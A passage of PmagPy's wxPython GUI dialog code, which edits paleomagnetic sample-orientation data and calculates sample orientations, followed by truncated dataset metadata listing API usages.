flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.AddSpacer(10)\n #vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(20)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n def on_add_file_button(self,event):\n text = \"choose file to convert to MagIC\"\n pw.on_add_file_button(self.bSizer0, self.WD, event, text)\n\n def on_okButton(self, event):\n os.chdir(self.WD)\n COMMAND = \"\"\n pw.run_command_and_close_window(self, COMMAND, outfile)\n\n def on_helpButton(self, event):\n pw.on_helpButton(text='')\n\n\n#=================================================================\n# demag_orient:\n# read/write demag_orient.txt\n# calculate sample orientation\n#=================================================================\n\n\nclass OrientFrameGrid3(wx.Frame):\n def __init__(self, parent, id, title, WD, contribution, size):\n wx.Frame.__init__(self, parent, -1, title, size=size,\n name='calculate geographic directions')\n\n #--------------------\n # initialize stuff\n #--------------------\n self.parent = parent\n if sys.platform in ['win32', 'win64']:\n self.panel = wx.ScrolledWindow(self, style=wx.SIMPLE_BORDER|wx.ALWAYS_SHOW_SB)\n else:\n self.panel = wx.Panel(self, style=wx.SIMPLE_BORDER)\n\n self.WD = WD\n #self.Data_hierarchy = Data_hierarchy\n self.contribution = contribution\n\n # contribution has already propagated measurement data...\n if 'samples' not in self.contribution.tables:\n print('-E- No sample data available')\n samples_name_list = []\n else:\n samples_name_list = self.contribution.tables['samples'].df.index.unique()\n\n self.orient_data = {}\n try:\n fname = os.path.join(self.WD, \"demag_orient.txt\")\n self.orient_data, dtype, keys = pmag.magic_read_dict(fname, sort_by_this_name=\"sample_name\",\n return_keys=True)\n\n except Exception as ex:\n print(\"-W-\", ex)\n\n # re-do the 'quit' binding so that it only closes the current window\n self.parent.Bind(wx.EVT_MENU, lambda event: self.parent.menubar.on_quit(event, self), self.parent.menubar.file_quit)\n\n # self.headers is a list of two-item tuples.\n #the first is the proper column name as understood by orientation_magic.py\n # the second is the name for display in the GUI\n self.header_display_names = [\"sample_name\", \"sample_orientation_flag\", \"mag_azimuth\",\n \"field_dip\", \"bedding_dip_direction\", \"bedding_dip\",\n \"shadow_angle\", \"latitude\", \"longitude\", \"mm/dd/yy\",\n \"hh:mm\", \"GPS_baseline\", \"GPS_Az\"]\n self.header_names = [\"sample_name\", \"sample_orientation_flag\", \"mag_azimuth\",\n \"field_dip\", \"bedding_dip_direction\", \"bedding_dip\",\n \"shadow_angle\", \"lat\", \"long\", \"date\",\n \"hhmm\", \"GPS_baseline\", \"GPS_Az\"]\n self.headers = list(zip(self.header_names, self.header_display_names))\n\n # get sample table and convert relevant headers to orient.txt format\n if (not self.orient_data) and ('samples' in self.contribution.tables):\n print(\"-I- Couldn't find demag_orient.txt, trying to extract information from samples table\")\n samp_container = self.contribution.tables['samples']\n # get lat/lon from sites if available\n if 'sites' in self.contribution.tables:\n site_contianer = self.contribution.tables['sites']\n self.contribution.propagate_cols(['lat', 'lon'], 'samples', 'sites')\n #\n raw_orient_data = samp_container.convert_to_pmag_data_list(\"dict\")\n # convert from 3.0. headers to orient.txt headers\n self.orient_data = {}\n orient_data = {}\n # must group to ensure that lat/lon/etc. are found no matter what\n df = samp_container.df\n res = df.T.apply(dict).groupby(df.index)\n for grouped in res:\n new_dict = {}\n ind_name = grouped[0]\n dictionaries = grouped[1]\n for dictionary in dictionaries:\n for key, value in dictionary.items():\n if key in new_dict:\n continue\n if (value and (value != 'None')) or (value == 0):\n new_dict[key] = value\n for key in dictionary.keys():\n if key not in new_dict:\n new_dict[key] = None\n orient_data[ind_name] = new_dict\n for key, rec in list(orient_data.items()):\n self.orient_data[key] = map_magic.mapping(rec, map_magic.magic3_2_orient_magic_map)\n # create grid\n self.create_sheet()\n\n TEXT = \"\"\"A template file named 'demag_orient.txt', for sample-level orientation data, was created in your MagIC working directory.\n\n You can view/modify demag_orient.txt here. To edit all the values in a column, click on the column header and then enter your desired value, or select an item from the drop-down menu.\n\n If you already have these data in MagIC format in Excel or Open Office, save the file as 'tab delimited' and then use the 'Import Orientation File' button below.\n\n After orientation data is filled in, you can Calculate sample orientations. Method codes will be added during this step. This will write orientation data to the site and sample tables.\n\"\"\"\n label_boxsizer = wx.StaticBoxSizer( wx.StaticBox( self.panel, wx.ID_ANY, 'input orientation data ' ), wx.VERTICAL )\n # width, height\n label = wx.StaticText(self.panel, label=TEXT, size=(600, 200))\n btn_box = wx.BoxSizer(wx.HORIZONTAL)\n save_btn = wx.Button(self.panel, wx.ID_ANY, \"Save Orientation File\")\n self.Bind(wx.EVT_BUTTON, self.on_m_save_file, save_btn)\n import_btn = wx.Button(self.panel, wx.ID_ANY, \"Import Orientation File\")\n self.Bind(wx.EVT_BUTTON, self.on_m_open_file, import_btn)\n calculate_btn = wx.Button(self.panel, wx.ID_ANY, \"Calculate Sample Orientations\")\n self.Bind(wx.EVT_BUTTON, self.on_m_calc_orient, calculate_btn)\n btn_box.Add(save_btn)\n btn_box.Add(import_btn, flag=wx.LEFT, border=5)\n btn_box.Add(calculate_btn, flag=wx.LEFT, border=5)\n\n self.vbox = wx.BoxSizer(wx.VERTICAL)\n #\n label_boxsizer.Add(label, flag=wx.CENTRE)\n self.vbox.Add(label_boxsizer, flag=wx.CENTRE|wx.ALL, border=15)\n #self.vbox.Add(label, flag=wx.CENTRE|wx.ALL, border=15)\n self.vbox.Add(btn_box, flag=wx.CENTRE)\n self.vbox.Add(self.grid, flag=wx.ALL, border=20)\n self.hbox_all = wx.BoxSizer(wx.HORIZONTAL)\n self.hbox_all.Add(self.vbox)\n if sys.platform in ['win32', 'win64']:\n self.panel.SetScrollbars(20, 20, 50, 50)\n self.panel.SetSizer(self.hbox_all)\n self.hbox_all.Fit(self)\n\n self.Bind(wx.EVT_CLOSE, self.OnCloseWindow)\n # save the template\n self.on_m_save_file(None)\n self.Centre()\n self.Show()\n\n\n\n def create_sheet(self):\n '''\n create an editable grid showing demag_orient.txt\n '''\n #--------------------------------\n # orient.txt supports many other headers\n # but we will only initialize with\n # the essential headers for\n # sample orientation and headers present\n # in existing demag_orient.txt file\n #--------------------------------\n\n\n #--------------------------------\n # create the grid\n #--------------------------------\n\n samples_list = list(self.orient_data.keys())\n samples_list.sort()\n self.samples_list = [ sample for sample in samples_list if sample is not \"\" ]\n #self.headers.extend(self.add_extra_headers(samples_list))\n display_headers = [header[1] for header in self.headers]\n self.grid = magic_grid.MagicGrid(self.panel, 'orient grid',\n self.samples_list, display_headers)\n self.grid.InitUI()\n\n #--------------------------------\n # color the columns by groups\n #--------------------------------\n\n for i in range(len(self.samples_list)):\n self.grid.SetCellBackgroundColour(i, 0, \"LIGHT GREY\")\n self.grid.SetCellBackgroundColour(i, 1, \"LIGHT STEEL BLUE\")\n self.grid.SetCellBackgroundColour(i, 2, \"YELLOW\")\n self.grid.SetCellBackgroundColour(i, 3, \"YELLOW\")\n self.grid.SetCellBackgroundColour(i, 4, \"PALE GREEN\")\n self.grid.SetCellBackgroundColour(i, 5, \"PALE GREEN\")\n self.grid.SetCellBackgroundColour(i, 6, \"KHAKI\")\n self.grid.SetCellBackgroundColour(i, 7, \"KHAKI\")\n self.grid.SetCellBackgroundColour(i, 8, \"KHAKI\")\n self.grid.SetCellBackgroundColour(i, 9, \"KHAKI\")\n self.grid.SetCellBackgroundColour(i, 10, \"KHAKI\")\n self.grid.SetCellBackgroundColour(i, 11, \"LIGHT MAGENTA\")\n self.grid.SetCellBackgroundColour(i, 12, \"LIGHT MAGENTA\")\n\n\n #--------------------------------\n # fill data from self.orient_data\n #--------------------------------\n\n headers = [header[0] for header in self.headers]\n for sample in self.samples_list:\n for key in list(self.orient_data[sample].keys()):\n if key in headers:\n sample_index = self.samples_list.index(sample)\n i = headers.index(key)\n val = str(self.orient_data[sample][key])\n # if it's a pmag_object, use its name\n try:\n val = val.name\n except AttributeError:\n pass\n if val and val != \"None\":\n self.grid.SetCellValue(sample_index, i, val)\n\n #--------------------------------\n\n #--------------------------------\n # fill in some default values\n #--------------------------------\n for row in range(self.grid.GetNumberRows()):\n col = 1\n if not self.grid.GetCellValue(row, col):\n self.grid.SetCellValue(row, col, 'g')\n\n #--------------------------------\n\n # temporary trick to get drop-down-menus to work\n self.grid.changes = {'a'}\n\n self.grid.AutoSize()\n self.drop_down_menu = drop_down_menus3.Menus(\"orient\", self.contribution, self.grid)\n self.Bind(wx.grid.EVT_GRID_LABEL_LEFT_CLICK, self.onLeftClickLabel, self.grid)\n\n def update_sheet(self):\n self.grid.Destroy()\n self.create_sheet()\n self.vbox.Add(self.grid, flag=wx.ALL, border=20)\n #self.Hide()\n #self.Show()\n self.hbox_all.Fit(self.panel)\n #self.panel.Refresh()\n self.Hide()\n self.Show()\n\n def onLeftClickLabel(self, event):\n \"\"\"\n When user clicks on a grid label, determine if it is a row label or a col label.\n Pass along the event to the appropriate function.\n (It will either highlight a column for editing all values, or highlight a row for deletion).\n \"\"\"\n #if event.Col == -1 and event.Row == -1:\n # pass\n #elif event.Col < 0:\n # self.onSelectRow(event)\n if event.Row < 0:\n self.drop_down_menu.on_label_click(event)\n\n\n def on_m_open_file(self,event):\n '''\n open orient.txt\n read the data\n display the data from the file in a new grid\n '''\n dlg = wx.FileDialog(\n self, message=\"choose orient file\",\n defaultDir=self.WD,\n defaultFile=\"\",\n style=wx.FD_OPEN | wx.FD_CHANGE_DIR\n )\n if dlg.ShowModal() == wx.ID_OK:\n orient_file = dlg.GetPath()\n dlg.Destroy()\n new_data, dtype, keys = pmag.magic_read_dict(orient_file,\n sort_by_this_name=\"sample_name\",\n return_keys=True)\n\n if len(new_data) > 0:\n self.orient_data={}\n self.orient_data=new_data\n #self.create_sheet()\n self.update_sheet()\n print(\"-I- If you don't see a change in the spreadsheet, you may need to manually re-size the window\")\n\n def on_m_save_file(self,event):\n\n '''\n save demag_orient.txt\n (only the columns that appear on the grid frame)\n '''\n fout = open(os.path.join(self.WD, \"demag_orient.txt\"), 'w')\n STR = \"tab\\tdemag_orient\\n\"\n fout.write(STR)\n headers = [header[0] for header in self.headers]\n STR = \"\\t\".join(headers) + \"\\n\"\n fout.write(STR)\n for sample in self.samples_list:\n STR = \"\"\n for header in headers:\n sample_index = self.samples_list.index(sample)\n i = headers.index(header)\n value = self.grid.GetCellValue(sample_index, i)\n STR = STR + value + \"\\t\"\n fout.write(STR[:-1] + \"\\n\")\n fout.close()\n if event != None:\n dlg1 = wx.MessageDialog(None,caption=\"Message:\", message=\"data saved in file demag_orient.txt\" ,style=wx.OK|wx.ICON_INFORMATION)\n dlg1.ShowModal()\n dlg1.Destroy()\n\n\n def on_m_calc_orient(self,event):\n '''\n This fucntion does exactly what the 'import orientation' fuction does in MagIC.py\n after some dialog boxes the function calls orientation_magic.py\n '''\n # first see if demag_orient.txt\n self.on_m_save_file(None)\n orient_convention_dia = orient_convention(None)\n orient_convention_dia.Center()\n #orient_convention_dia.ShowModal()\n if orient_convention_dia.ShowModal() == wx.ID_OK:\n ocn_flag = orient_convention_dia.ocn_flag\n dcn_flag = orient_convention_dia.dcn_flag\n gmt_flags = orient_convention_dia.gmt_flags\n orient_convention_dia.Destroy()\n else:\n return\n\n or_con = orient_convention_dia.ocn\n dec_correction_con = int(orient_convention_dia.dcn)\n try:\n hours_from_gmt = float(orient_convention_dia.gmt)\n except:\n hours_from_gmt = 0\n try:\n dec_correction = float(orient_convention_dia.correct_dec)\n except:\n dec_correction = 0\n\n method_code_dia=method_code_dialog(None)\n method_code_dia.Center()\n if method_code_dia.ShowModal() == wx.ID_OK:\n bedding_codes_flags=method_code_dia.bedding_codes_flags\n methodcodes_flags=method_code_dia.methodcodes_flags\n method_code_dia.Destroy()\n else:\n print(\"-I- Canceling calculation\")\n return\n\n method_codes = method_code_dia.methodcodes\n average_bedding = method_code_dia.average_bedding\n bed_correction = method_code_dia.bed_correction\n\n command_args=['orientation_magic.py']\n command_args.append(\"-WD %s\"%self.WD)\n command_args.append(\"-Fsa er_samples_orient.txt\")\n command_args.append(\"-Fsi er_sites_orient.txt \")\n command_args.append(\"-f %s\"%\"demag_orient.txt\")\n command_args.append(ocn_flag)\n command_args.append(dcn_flag)\n command_args.append(gmt_flags)\n command_args.append(bedding_codes_flags)\n command_args.append(methodcodes_flags)\n commandline = \" \".join(command_args)\n\n print(\"-I- executing command: %s\" %commandline)\n os.chdir(self.WD)\n if os.path.exists(os.path.join(self.WD, 'er_samples.txt')) or os.path.exists(os.path.join(self.WD, 'er_sites.txt')):\n append = True\n elif os.path.exists(os.path.join(self.WD, 'samples.txt')) or os.path.exists(os.path.join(self.WD, 'sites.txt')):\n append = True\n else:\n append = False\n samp_file = \"er_samples.txt\"\n site_file = \"er_sites.txt\"\n success, error_message = ipmag.orientation_magic(or_con, dec_correction_con, dec_correction,\n bed_correction, hours_from_gmt=hours_from_gmt,\n method_codes=method_codes, average_bedding=average_bedding,\n orient_file='demag_orient.txt', samp_file=samp_file,\n site_file=site_file, input_dir_path=self.WD,\n output_dir_path=self.WD, append=append, data_model=3)\n\n if not success:\n dlg1 = wx.MessageDialog(None,caption=\"Message:\", message=\"-E- ERROR: Error in running orientation_magic\\n{}\".format(error_message) ,style=wx.OK|wx.ICON_INFORMATION)\n dlg1.ShowModal()\n dlg1.Destroy()\n\n print(\"-E- ERROR: Error in running orientation_magic\")\n return\n else:\n dlg2 = wx.MessageDialog(None,caption=\"Message:\", message=\"-I- Successfully ran orientation_magic\", style=wx.OK|wx.ICON_INFORMATION)\n dlg2.ShowModal()\n dlg2.Destroy()\n self.Parent.Show()\n self.Parent.Raise()\n self.Destroy()\n self.contribution.add_magic_table('samples')\n return\n\n\n def OnCloseWindow(self,event):\n dlg1 = wx.MessageDialog(self,caption=\"Message:\", message=\"Save changes to demag_orient.txt?\\n \" ,style=wx.OK|wx.CANCEL)\n result = dlg1.ShowModal()\n if result == wx.ID_OK:\n self.on_m_save_file(None)\n dlg1.Destroy()\n self.Parent.Show()\n self.Parent.Raise()\n self.Destroy()\n if result == wx.ID_CANCEL:\n dlg1.Destroy()\n self.Parent.Show()\n self.Parent.Raise()\n self.Destroy()\n\n\nclass orient_convention(wx.Dialog):\n\n def __init__(self, *args, **kw):\n super(orient_convention, self).__init__(*args, **kw)\n\n self.InitUI()\n #self.SetSize((250, 200))\n self.SetTitle(\"set orientation convention\")\n\n def InitUI(self):\n\n pnl = wx.Panel(self)\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n #-----------------------\n # orientation convention\n #-----------------------\n\n sbs = wx.StaticBoxSizer( wx.StaticBox( pnl, wx.ID_ANY, 'orientation convention' ), wx.VERTICAL )\n\n sbs.AddSpacer(5)\n self.oc_rb1 = wx.RadioButton(pnl, -1,label='Pomeroy: Lab arrow azimuth = mag_azimuth; Lab arrow dip=-field_dip (field_dip is hade)',name='1', style=wx.RB_GROUP)\n sbs.Add(self.oc_rb1)\n sbs.AddSpacer(5)\n self.oc_rb2 = wx.RadioButton(pnl, -1, label='Lab arrow azimuth = mag_azimuth-90 (mag_azimuth is strike); Lab arrow dip = -field_dip', name='2')\n sbs.Add(self.oc_rb2)\n sbs.AddSpacer(5)\n self.oc_rb3 = wx.RadioButton(pnl, -1, label='Lab arrow azimuth = mag_azimuth; Lab arrow dip = 90-field_dip (field_dip is inclination of lab arrow)', name='3')\n sbs.Add(self.oc_rb3)\n sbs.AddSpacer(5)\n self.oc_rb4 = wx.RadioButton(pnl, -1, label='Lab arrow azimuth and dip are same as mag_azimuth, field_dip', name='4')\n sbs.Add(self.oc_rb4)\n sbs.AddSpacer(5)\n self.oc_rb5 = wx.RadioButton(pnl, -1, label='ASC: Lab arrow azimuth and dip are mag_azimuth, field_dip-90 (field arrow is inclination of specimen Z direction)',name='5')\n sbs.Add(self.oc_rb5)\n sbs.AddSpacer(5)\n self.oc_rb6 = wx.RadioButton(pnl, -1, label='Lab arrow azimuth = mag_azimuth-90 (mag_azimuth is strike); Lab arrow dip = 90-field_dip', name='6')\n sbs.Add(self.oc_rb6)\n sbs.AddSpacer(5)\n\n #-----------------------\n # declination correction\n #-----------------------\n sbs2 = wx.StaticBoxSizer( wx.StaticBox( pnl, wx.ID_ANY, 'declination correction' ), wx.VERTICAL )\n hbox_dc1 = wx.BoxSizer(wx.HORIZONTAL)\n\n sbs2.AddSpacer(5)\n self.dc_rb1 = wx.RadioButton(pnl, -1, 'Use the IGRF DEC value at the lat/long and date supplied', (10, 50), style=wx.RB_GROUP)\n self.dc_rb2 = wx.RadioButton(pnl, -1, 'Use this DEC:', (10, 50))\n self.dc_tb2 = wx.TextCtrl(pnl,style=wx.CENTER)\n self.dc_rb3 = wx.RadioButton(pnl, -1, 'DEC=0, mag_az is already corrected in file', (10, 50))\n\n sbs2.Add(self.dc_rb1)\n sbs2.AddSpacer(5)\n hbox_dc1.Add(self.dc_rb2)\n hbox_dc1.AddSpacer(5)\n hbox_dc1.Add(self.dc_tb2)\n sbs2.Add(hbox_dc1)\n\n sbs2.AddSpacer(5)\n sbs2.Add(self.dc_rb3)\n sbs2.AddSpacer(5)\n\n\n #-----------------------\n # orienation priority\n #-----------------------\n sbs3 = wx.StaticBoxSizer( wx.StaticBox( pnl, wx.ID_ANY, 'orientation priority' ), wx.VERTICAL )\n\n sbs3.AddSpacer(5)\n self.op_rb1 = wx.RadioButton(pnl, -1, label='1) sun compass 2) differential GPS 3) magnetic compass',\n name='1', style=wx.RB_GROUP)\n sbs3.Add(self.op_rb1)\n sbs3.AddSpacer(5)\n self.op_rb2 = wx.RadioButton(pnl, -1, label='1) differential GPS 2) magnetic compass 3) sun compass ',\n name='2')\n sbs3.Add(self.op_rb2)\n sbs3.AddSpacer(5)\n\n\n #-----------------------\n # add local time for GMT\n #-----------------------\n\n sbs4 = wx.StaticBoxSizer( wx.StaticBox( pnl, wx.ID_ANY, 'add local time' ), wx.HORIZONTAL )\n #hbox_alt = wx.BoxSizer(wx.HORIZONTAL)\n\n sbs4.AddSpacer(5)\n self.dc_alt = wx.TextCtrl(pnl,style=wx.CENTER)\n alt_txt = wx.StaticText(pnl, label=\"Hours to ADD to local time for GMT, default is 0\",\n style=wx.TE_CENTER)\n sbs4.Add(alt_txt)\n sbs4.AddSpacer(5)\n sbs4.Add(self.dc_alt)\n\n #-----------------------\n # OK button\n #-----------------------\n\n hbox2 = wx.BoxSizer(wx.HORIZONTAL)\n self.okButton = wx.Button(pnl, wx.ID_OK, \"&OK\")\n self.Bind(wx.EVT_BUTTON, self.OnOK, self.okButton)\n hbox2.Add(self.okButton)\n self.cancelButton = wx.Button(pnl, wx.ID_CANCEL, \"&Cancel\")\n self.Bind(wx.EVT_BUTTON, self.OnCancel, self.cancelButton)\n hbox2.Add(self.cancelButton)\n\n\n #-----------------------\n # design the frame\n #-----------------------\n\n vbox.AddSpacer(10)\n vbox.Add(sbs)\n vbox.AddSpacer(10)\n vbox.Add(sbs2)\n vbox.AddSpacer(10)\n vbox.Add(sbs3)\n vbox.AddSpacer(10)\n vbox.Add(sbs4)\n vbox.AddSpacer(10)\n vbox.Add(hbox2)\n vbox.AddSpacer(10)\n\n hbox1=wx.BoxSizer(wx.HORIZONTAL)\n hbox1.AddSpacer(10)\n hbox1.Add(vbox)\n hbox1.AddSpacer(10)\n\n pnl.SetSizer(hbox1)\n hbox1.Fit(self)\n\n #-----------------------\n # intialize defalut value\n #-----------------------\n\n self.oc_rb4.SetValue(True)\n self.dc_rb1.SetValue(True)\n self.op_rb1.SetValue(True)\n\n def OnCancel(self, e):\n self.EndModal(wx.ID_CANCEL)\n\n def OnOK(self, e):\n self.ocn = \"\"\n if self.oc_rb1.GetValue() == True:\n self.ocn = \"1\"\n if self.oc_rb2.GetValue() == True:\n self.ocn=\"2\"\n if self.oc_rb3.GetValue() == True:\n self.ocn=\"3\"\n if self.oc_rb4.GetValue() == True:\n self.ocn = \"4\"\n if self.oc_rb5.GetValue() == True:\n self.ocn=\"5\"\n if self.oc_rb6.GetValue() == True:\n self.ocn=\"6\"\n\n self.dcn = \"\"\n self.correct_dec = \"\"\n if self.dc_rb1.GetValue() == True:\n self.dcn = \"1\"\n if self.dc_rb2.GetValue() == True:\n self.dcn=\"2\"\n try:\n self.correct_dec = float(self.dc_tb2.GetValue())\n except:\n dlg1 = wx.MessageDialog(None, caption=\"Error:\", message=\"Add declination\", style=wx.OK|wx.ICON_INFORMATION)\n dlg1.ShowModal()\n dlg1.Destroy()\n\n if self.dc_rb3.GetValue()==True:\n self.dcn = \"3\"\n\n if self.op_rb1.GetValue() == True:\n self.op = \"1\"\n if self.op_rb2.GetValue() == True:\n self.op = \"2\"\n\n if self.dc_alt.GetValue() != \"\":\n try:\n self.gmt = float(self.dc_alt.GetValue())\n gmt_flags = \"-gmt \" + self.dc_alt.GetValue()\n except:\n gmt_flags=\"\"\n else:\n self.gmt = \"\"\n gmt_flags = \"\"\n #-------------\n self.ocn_flag = \"-ocn \"+ self.ocn\n self.dcn_flag = \"-dcn \"+ self.dcn\n self.gmt_flags = gmt_flags\n self.EndModal(wx.ID_OK)\n #self.Close()\n\n\nclass method_code_dialog(wx.Dialog):\n\n def __init__(self, *args, **kw):\n super(method_code_dialog, self).__init__(*args, **kw)\n\n self.InitUI()\n self.SetTitle(\"additional required information\")\n\n def InitUI(self):\n\n pnl = wx.Panel(self)\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n #-----------------------\n # MagIC codes\n #-----------------------\n\n sbs1 = wx.StaticBoxSizer( wx.StaticBox( pnl, wx.ID_ANY, 'MagIC codes' ), wx.VERTICAL )\n self.cb1 = wx.CheckBox(pnl, -1, 'FS-FD: field sampling done with a drill')\n self.cb2 = wx.CheckBox(pnl, -1, 'FS-H: field sampling done with hand sample')\n self.cb3 = wx.CheckBox(pnl, -1, 'FS-LOC-GPS: field location done with GPS')\n self.cb4 = wx.CheckBox(pnl, -1, 'FS-LOC-MAP: field location done with map')\n self.cb5 = wx.CheckBox(pnl, -1, 'SO-POM: a Pomeroy orientation device was used')\n self.cb6 = wx.CheckBox(pnl, -1, 'SO-ASC: an ASC orientation device was used')\n self.cb7 = wx.CheckBox(pnl, -1, 'SO-MAG: magnetic compass used for all orientations')\n self.cb8 = wx.CheckBox(pnl, -1, 'SO-SUN: sun compass used for all orientations')\n self.cb9 = wx.CheckBox(pnl, -1, 'SO-SM: either magnetic or sun used on all orientations ')\n self.cb10 = wx.CheckBox(pnl, -1, 'SO-SIGHT: orientation from sighting')\n\n for cb in [self.cb1, self.cb2, self.cb3, self.cb4, self.cb5,\n self.cb6, self.cb7, self.cb8, self.cb9, self.cb10]:\n sbs1.Add(cb, flag=wx.BOTTOM, border=5)\n\n #-----------------------\n # Bedding convention\n #-----------------------\n\n sbs2 = wx.StaticBoxSizer(wx.StaticBox(pnl, wx.ID_ANY, 'bedding convention'), wx.VERTICAL)\n self.bed_con1 = wx.CheckBox(pnl, -1, 'Take fisher mean of bedding poles?')\n self.bed_con2 = wx.CheckBox(pnl, -1, \"Don't correct bedding dip direction with declination - already correct\")\n\n sbs2.Add(self.bed_con1, flag=wx.BOTTOM, border=5)\n sbs2.Add(self.bed_con2, flag=wx.BOTTOM, border=5)\n\n #-----------------------\n # OK button\n #-----------------------\n\n hbox2 = wx.BoxSizer(wx.HORIZONTAL)\n self.okButton = wx.Button(pnl, wx.ID_OK, \"&OK\")\n self.Bind(wx.EVT_BUTTON, self.OnOK, self.okButton)\n hbox2.Add(self.okButton)\n self.cancelButton = wx.Button(pnl, wx.ID_CANCEL, \"&Cancel\")\n self.Bind(wx.EVT_BUTTON, self.OnCancel, self.cancelButton)\n hbox2.Add(self.cancelButton)\n\n #-----------------------\n # design the frame\n #-----------------------\n vbox.Add(sbs1)\n vbox.AddSpacer(5)\n vbox.Add(sbs2)\n vbox.AddSpacer(5)\n vbox.Add(hbox2)\n vbox.AddSpacer(10)\n\n hbox1=wx.BoxSizer(wx.HORIZONTAL)\n hbox1.AddSpacer(10)\n hbox1.Add(vbox)\n hbox1.AddSpacer(10)\n\n pnl.SetSizer(hbox1)\n hbox1.Fit(self)\n\n def OnCancel(self, e):\n self.EndModal(wx.ID_CANCEL)\n\n def OnOK(self, e):\n methodcodes=[]\n if self.cb1.GetValue() == True:\n methodcodes.append('FS-FD')\n if self.cb2.GetValue() == True:\n methodcodes.append('FS-H')\n if self.cb3.GetValue() == True:\n methodcodes.append('FS-LOC-GPS')\n if self.cb4.GetValue() == True:\n methodcodes.append('FS-LOC-MAP')\n if self.cb5.GetValue() == True:\n methodcodes.append('SO-POM')\n if self.cb6.GetValue() == True:\n methodcodes.append('SO-ASC')\n if self.cb7.GetValue() == True:\n methodcodes.append('SO-MAG')\n if self.cb8.GetValue() == True:\n methodcodes.append('SO-SUN')\n if self.cb9.GetValue() == True:\n methodcodes.append('SO-SM')\n if self.cb10.GetValue() == True:\n methodcodes.append('SO-SIGHT')\n\n if methodcodes == []:\n self.methodcodes_flags=\"\"\n self.methodcodes = \"\"\n else:\n self.methodcodes_flags = \"-mcd \" + \":\".join(methodcodes)\n self.methodcodes = \":\".join(methodcodes)\n\n bedding_codes=[]\n\n if self.bed_con1.GetValue() == True:\n bedding_codes.append(\"-a\")\n self.average_bedding = True\n else:\n self.average_bedding = False\n if self.bed_con2.GetValue() ==True:\n bedding_codes.append(\"-BCN\")\n self.bed_correction = False\n else:\n self.bed_correction = True\n self.bedding_codes_flags = \" \".join(bedding_codes)\n self.EndModal(wx.ID_OK)\n #self.Close()ls *.html\n", "sub_path": "dialogs/pmag_gui_dialogs.py", "file_name": "pmag_gui_dialogs.py", "file_ext": "py", "file_size_in_byte": 141142, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "wx.Dialog", "line_number": 26, "usage_type": "attribute"}, {"api_name": "wx.Dialog.__init__", "line_number": 28, "usage_type": "call"}, {"api_name": "wx.Dialog", "line_number": 28, "usage_type": "attribute"}, {"api_name": "wx.Panel", "line_number": 36, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 37, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 37, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 42, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 42, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 42, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 42, "usage_type": "attribute"}, {"api_name": "wx.RadioButton", "line_number": 47, "usage_type": "call"}, {"api_name": "wx.BOTTOM", "line_number": 49, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 51, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 51, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 51, "usage_type": "attribute"}, {"api_name": "wx.EVT_RADIOBUTTON", "line_number": 53, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 62, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 62, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 63, "usage_type": "call"}, {"api_name": "wx.EVT_BUTTON", "line_number": 65, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 66, "usage_type": "call"}, {"api_name": "wx.ID_CANCEL", "line_number": 66, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 67, "usage_type": "attribute"}, {"api_name": "wx.EVT_CLOSE", "line_number": 68, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 70, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 72, "usage_type": "call"}, {"api_name": "wx.EVT_BUTTON", "line_number": 73, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 89, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 89, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 108, "usage_type": "call"}, {"api_name": "programs.conversion_scripts.tdt_magic.convert", "line_number": 131, "usage_type": "call"}, {"api_name": "programs.conversion_scripts.tdt_magic", "line_number": 131, "usage_type": "name"}, {"api_name": "wx.Frame", "line_number": 155, "usage_type": "attribute"}, {"api_name": "wx.Frame.__init__", "line_number": 160, "usage_type": "call"}, {"api_name": "wx.Frame", "line_number": 160, "usage_type": "attribute"}, {"api_name": "wx.ID_ANY", "line_number": 160, "usage_type": "attribute"}, {"api_name": "wx.ScrolledWindow", "line_number": 161, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 173, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 173, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 174, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 174, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.combine_files", "line_number": 178, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 178, "usage_type": "name"}, {"api_name": "wx.Button", "line_number": 181, "usage_type": "call"}, {"api_name": "wx.ID_OK", "line_number": 181, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 182, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 184, "usage_type": "call"}, {"api_name": "wx.ID_CANCEL", "line_number": 184, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 185, "usage_type": "attribute"}, {"api_name": "wx.EVT_CLOSE", "line_number": 186, "usage_type": "attribute"}, 